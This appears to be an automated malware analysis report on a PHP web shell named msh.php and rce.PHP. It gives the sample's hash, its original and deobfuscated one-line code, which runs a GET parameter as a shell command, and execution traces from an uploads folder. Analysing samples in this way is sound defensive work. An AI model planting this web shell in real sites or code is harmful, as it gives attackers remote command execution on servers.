PHP Malware Analysis

msh.php, rce.PHP

md5: bdd25b47a864fe8dcc262c4204a25d7d

Deobfuscated PHP code

<?php

echo `{$_GET[0]}`;

Execution traces

data/traces/bdd25b47a864fe8dcc262c4204a25d7d_trace-1676254186.0608.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:10:11.958639]
1	0	1	0.000193	393512
1	3	0	0.000256	393936	{main}	1		/var/www/html/uploads/rce.PHP	0	0
2	4	0	0.000301	393936	shell_exec	0		/var/www/html/uploads/rce.PHP	1	1	''
2	4	1	0.000326	393968
2	4	R			FALSE
1	3	1	0.000341	393936
			0.000367	314224
TRACE END   [2023-02-13 00:10:11.958854]

data/traces/bdd25b47a864fe8dcc262c4204a25d7d_trace-1676261441.94.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:11:07.837822]
1	0	1	0.000213	393512
1	3	0	0.000266	393936	{main}	1		/var/www/html/uploads/rce.PHp	0	0
2	4	0	0.000306	393936	shell_exec	0		/var/www/html/uploads/rce.PHp	1	1	''
2	4	1	0.000333	393968
2	4	R			FALSE
1	3	1	0.000348	393936
			0.000377	314224
TRACE END   [2023-02-13 02:11:07.838023]

data/traces/bdd25b47a864fe8dcc262c4204a25d7d_trace-1676261473.8734.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:11:39.771216]
1	0	1	0.000143	393512
1	3	0	0.000188	393936	{main}	1		/var/www/html/uploads/msh.php	0	0
2	4	0	0.000221	393936	shell_exec	0		/var/www/html/uploads/msh.php	1	1	''
2	4	1	0.000244	393968
2	4	R			FALSE
1	3	1	0.000258	393936
			0.000281	314224
TRACE END   [2023-02-13 02:11:39.771382]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?=`$_GET[0]`?>